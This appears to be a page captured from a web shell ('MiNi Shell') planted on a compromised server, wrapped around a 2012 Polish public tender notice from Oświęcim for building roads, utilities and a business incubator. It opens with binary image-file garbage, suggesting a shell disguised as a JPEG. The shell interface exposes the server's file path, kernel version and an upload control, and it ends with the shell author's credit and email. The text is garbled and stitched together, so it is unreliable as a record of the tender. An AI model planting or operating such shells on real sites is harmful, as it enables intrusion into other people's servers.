JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120803/285380-N-2012.html

<p class="kh_header"><b>Oświęcim: Budowa infrastruktury dla rozbudowy Miejskiej Strefy Aktywności Gospodarczej Nowe Dwory w Oświęcimiu realizowana w trybie zaprojektuj i wybuduj w ramach Małopolskiego Regionalnego Programu  Operacyjnego na lata 2007-2013 - Priorytet: Infrastruktura dla rozwoju gospodarczego, Działanie: Tworzenie i rozwój stref aktywności gospodarczej, Schemat B: Strefy aktywności gospodarczej o powierzchni powyżej 20 ha.</b><br>
<b>Numer ogłoszenia: 285380 - 2012; data zamieszczenia: 03.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa infrastruktury dla rozbudowy Miejskiej Strefy Aktywności Gospodarczej Nowe Dwory w Oświęcimiu realizowana w trybie zaprojektuj i wybuduj w ramach Małopolskiego Regionalnego Programu  Operacyjnego na lata 2007-2013 - Priorytet: Infrastruktura dla rozwoju gospodarczego, Działanie: Tworzenie i rozwój stref aktywności gospodarczej, Schemat B: Strefy aktywności gospodarczej o powierzchni powyżej 20 ha..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia polega na zaprojektowaniu i zrealizowaniu robót budowlanych w oparciu o załączony program funkcjonalno-użytkowy i obejmuje kompleksowe zagospodarowanie południowej części Miejskiej Strefy Aktywności Gospodarczej w Oświęcimiu oraz budowę Inkubatora Przedsiębiorczości
w szczególności:

1) Zadanie nr 1: Budowę infrastruktury technicznej dla Strefy Aktywności Gospodarczej.
2) Zadanie nr 2: Budowę inkubatora przedsiębiorczości w ramach Strefy Aktywności Gospodarczej.

Ad 1) Budowa infrastruktury technicznej dla Strefy Aktywności Gospodarczej obejmuje wykonanie:

drogi wewnętrznej o długości ok. 878mb;
chodnika jednostronnego o pow. ok. 1869 m2;
skrzyżowania - 2 szt. w tym jedno z drogą krajową dk 44;
kanalizacji opadowej o długości ok. 533mb;
oświetlenia ulicznego o długości ok. 896mb;
kolektora kanalizacji sanitarnej o dł. ok. 880mb;
włączenia do istniejącej sieci kanalizacji sanitarnej o długości ok. 50mb.

Ad 2) Budowa inkubatora przedsiębiorczości w ramach Strefy Aktywności Gospodarczej w tym: 

a) Podzadanie 2.1: Budowa inkubatora Przedsiębiorczości wraz z infrastrukturą towarzyszącą na działkach o pow. całkowitej 7272m2, obejmuje:

budowę budynku głównego o powierzchni zabudowy ok. 750 m2,
budowę dwóch budynków halowych z zapleczem socjalno-biurowym o pow. zabudowy ok. 1400m2 (800m2 i 600m2),
budowę placów, dróg wewnętrznych o pow. ok. 3100m2,
ukształtowanie terenu i zieleń o pow. ok. 2000m2,
budowę ogrodzenia terenu o długości  ok. 356mb,
wyposażenie obiektów w środki trwałe.
b) Podzadanie 2.2: Infrastruktura drogowa i zaopatrzenie w media, obejmuje budowę:
drogi wewnętrznej o długości ok. 506mb,
chodnika jednostronnego o pow. ok. 1015m2,
skrzyżowania z drogą krajową dk 44- 2 szt,
kanalizacji opadowej o długości ok. 355mb,
oświetlenia ulicznego o długości ok. 529mb,
zatoki i przystanków autobusowych - 2 szt,
kolektora kanalizacji sanitarnej o długości ok. 493 mb.


4.  Ogólna charakterystyka planowanej inwestycji i dane techniczne:
Dokumentacja dla potrzeb realizacji przedmiotu zamówienia winna zawierać:
a)  badania geotechniczne i geologiczne,
b)  projekt podziału nieruchomości zajętych pod projektowane drogi i infrastrukturę drogową,
c)  aktualizację mapy do celów projektowych,
d)  inwentaryzację zieleni
e)  projekt  przebudowy i zabezpieczenia sieci uzbrojenia nadziemnego i podziemnego,
f)  projekt budowy dróg,
g)  projekt budowy i przebudowy oświetlenia ulicznego,
h)  projekt budowy kanalizacji deszczowej,
i)  projekt budowy kanalizacji sanitarnej,
j)  projekt budowy sieci wodociągowej.
k)  projekt budowy Inkubatora Przedsiębiorczości wraz z infrastrukturą towarzyszącą.
l)  projekt zieleni w zakresie objętym inwestycją,

Uwaga: Wszystkie projekty powinny być projektami budowlano-wykonawczymi.

5. Projektowane przedsięwzięcie planuje się wykonać w sposób opisany w Programie Funkcjonalno-Użytkowym przedsięwzięcia, a mianowicie:

jezdnie oraz poszerzenie ul. Pod Borem z betonu asfaltowego drogowego na podbudowie z kruszywa kamiennego drogowego; chodnik oraz zatoki autobusowe z betonowej kostki brukowej na podsypce cementowo-piaskowej na podbudowie z naturalnego kruszywa kamiennego drogowego. Kanalizacja deszczowa wykonana będzie opcjonalnie z rur z tworzywa sztucznego lub żelbetowych łączonych kielichowo	na uszczelki gumowe ze studniami rewizyjnymi z tworzyw sztucznych lub prefabrykowanych betonowych. W studniach rewizyjnych będą zastosowane szczelne przejścia dla rur kanalizacyjnych.
obiekty kubaturowe w technologii tradycyjnej: budynek główny biurowo-usługowy bez podpiwniczenia - dwukondygnacyjny, budynki hal 1 i 2 o konstrukcji szkieletu z kształtowników stalowych, bez podpiwniczenia - jednokondygnacyjne, przyłącze centralnego ogrzewania z rur preizolowanych, przyłącze wodociągowe z rur z tworzyw sztucznych, przyłącze kanalizacyjne deszczowe i sanitarne, zgodnie z warunkami technicznymi - do istniejącej kanalizacji deszczowej i sanitarnej. 

6. Zakres przedmiotu zamówienia obejmuje:

1) wykonanie koncepcji projektowej  w 4-ch egz.
2) wykonanie dokumentacji projektowej:
a) opracowanie projektu zagospodarowania terenu w 4-ch egz. na zaktualizowanym
przez projektanta podkładzie mapowym w skali 1:500, zawierającego: opis techniczny, część rysunkową z oznaczeniem projektowanych obiektów, granic nieruchomości i zwymiarowaniem projektowanych obiektów, wszystkie wymagane uzgodnienia,
b) opracowanie projektów budowlano-wykonawczych dla wszystkich poszczególnych branż wraz z opisami i rysunkami niezbędnymi do realizacji robót w razie potrzeby uzupełnienie szczegółowymi projektami umożliwiającymi wykonanie zamówienia bez konieczności zlecania dodatkowych opracowań w ilości 4-ch egz. dla każdej z branż. Uzyskanie wszelkich wymaganych uzgodnień  niezbędnych do uzyskania pozwolenia na budowę dla całego przedsięwzięcia inwestycyjnego,
c) opracowanie docelowego projektu organizacji ruchu - w ilości 4-ch egz.,
d) opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, właściwości stosowanych materiałów, sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, użytego sprzętu oraz  zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiarowych  w 2 egz.,
e) wykonanie przedmiarów robót, który powinien zawierać zestawienie przewidywanych do wykonania robót budowlanych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej, zgodnie z obowiązującymi w tym zakresie przepisami - 2 egz. dla każdego z zadań odrębnie,
f) opracowanie kosztorysów inwestorskich wykonanych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U. Nr 130, poz.1389 z 2004r.) w 2 egz. dla każdego z zadań odrębnie,
g) sporządzenie wyrysów i wypisów z rejestru gruntu w rozbiciu na:
- parcele objęte inwestycją
- parcele sąsiadujące z inwestycją,
h) wykonanie projektów podziału nieruchomości zajętych pod drogę i infrastrukturę drogową,
i) opracowanie i uzyskanie wszystkich niezbędnych materiałów na potrzeby decyzji o zezwoleniu na realizację inwestycji drogowej /ZriD/ i uzyskanie tej decyzji,
j) opracowanie i uzyskanie wszystkich niezbędnych materiałów do uzyskania decyzji o pozwoleniu na budowę dla inkubatora przedsiębiorczości oraz pozwolenia na budowę infrastruktury nie związanej z budową drogi i uzyskanie tych pozwoleń,
k) sporządzenie wniosku wraz z załącznikami na wycinkę drzew (w razie konieczności),
3) wykonanie wszelkich niezbędnych prac z uwzględnieniem poniesienia wszelkich opłat administracyjnych  koniecznych do realizacji  robót objętych przedmiotem zamówienia. Całość opracowania winna być sporządzona w wersji papierowej w ilości egzemplarzy wskazanych w niniejszym rozdziale oraz  na nośniku elektronicznym (płyta CD).
4) wykonanie wszelkich robót budowlanych oraz dostaw w zakresie podanym w programie funkcjonalno-użytkowym, specyfikacji istotnych warunków zamówienia zgodnie z dokumentacją projektową oraz obowiązującymi przepisami, zasadami wiedzy technicznej i sztuką budowlaną tj.:
a) budowę drogi wewnętrznej gminnej wraz z dwoma zjazdami z ul. Fabrycznej oraz ul. Pod Borem, z jezdnią o szerokości 6,0 m z poszerzeniem na łukach do 7,0 m o łącznej długości ok. 1400,00m,
b) budowę jednostronnego chodnika o szerokości 2,0 m wzdłuż całego ciągu drogowego o pow. ok. 2 900m2,
c) budowę zatok autobusowych o pow. ok. 400m2,
d) przebudowę odcinka ul. Pod Borem wraz z przebudową skrzyżowania z ul. Fabryczną z poszerzeniem jezdni do szerokości 6,0 m na długości 70 m,
e) budowę kanalizacji deszczowej dla odwodnienia drogi wewnętrznej gminnej o długości ok. 900 m,
f) budowę sieci oświetlenia ulicznego o długości ok. 1450 m,
g) budowę budynku głównego inkubatora o funkcji biurowo-usługowej wraz z częścią gastronomiczną- budynek dwukondygnacyjny o wysokości do kalenicy ok. 13,5 m 
i pow. zabudowy ok. 750m2,
h) budowę hali nr 1 produkcyjno-magazynowej wraz z zapleczem socjalno-biurowym- budynek jednokondygnacyjny o wysokości do kalenicy ok. 6m i pow. zabud. 800m2,
i) budynek hali nr 2 produkcyjno-magazynowej wraz z zapleczem socjalno-biurowym-
budynek jednokondygnacyjny o wysokości do kalenicy ok. 6,0m i pow. zabudowy ok. 600m2,
j) budowę dróg wewnętrznych o powierzchni ok. 300m2,
k) budowę ciągów pieszych o powierzchni ok. 400m2,
l) budowę parkingów dla samochodów osobowych o powierzchni ok. 1200 m2,
m) budowę placu manewrowego o powierzchni ok. 1200 m2,
n) ukształtowanie terenu wokół budynków wraz z szatą roślinną o pow. ok. 2000m2,
o) budowę przyłącza elektroenergetycznego o długości ok. 110m,
p) budowę przyłącza centralnego ogrzewania o długości ok. 70 m,
q) budowę przyłącza wodociągowego o długości ok. 80 m,
r) budowę przyłącza kanalizacji sanitarnej o długości ok. 105 m,
s) budowę przyłącza kanalizacji deszczowej o długości ok. 340 m..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 133.000,00 zł ( słownie: sto trzydzieści trzy tysiące  złotych 00/100)
Wadium winno zostać wniesione przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie wykonania projektów: w okresie ostatnich 3 lat co najmniej jednej usługi  polegającej na zaprojektowaniu budynku i drogi o łącznej wartości min. 250.000,00 zł brutto,
- w zakresie robót budowlanych: co najmniej jednej roboty budowlanej w zakresie objętym przedmiotem zamówienia tj. budowę budynku oraz budowę drogi o łącznej wartości min. 5.000.000,00 zł brutto.

Opis sposobu oceny spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się  zmianę umowy w następujących przypadkach: 
a) zmiany ustawowej stawki podatku od towarów i usług VAT w okresie obowiązywania umowy,
b) aktualizację danych Wykonawcy poprzez zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej,
c) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
d) z powodu działań osób trzecich uniemożliwiających wykonanie robót i prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
e) zmiany terminu wykonania przedmiotu umowy w przypadku wystąpienia zamówień dodatkowych o których mowa  w  art.  67,  ust. 1,  p-kt 5  ustawy  PZP , niezbędnych  do prawidłowego wykonania  zamówienia  podstawowego,  których  wykonanie  stało się konieczne na skutek  sytuacji niemożliwej wcześniej do przewidzenia i które  mają wpływ e) na termin realizacji zamówienia, pod warunkiem zaakceptowania zmiany terminu wykonania umowy przez MRPO,
f) wykonanie robót zamiennych, zgodnie z procedurami i wymogami zawartymi w przepisie art. 36 a ustawy Prawo budowlane pod warunkiem zaakceptowania przez MRPO,
g) zmiany harmonogramu rzeczowo-finansowego
h) zmniejszenie zakresu  przedmiotu  zamówienia oraz związane z tym zmniejszenie wartości umowy  pod warunkiem zostaną wcześniej zaakceptowane przez MRPO</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych, ul. Solskiego 2 pok 11, 32-600 Oświęcim.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2 pok 01, 32-600 Oświęcim.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com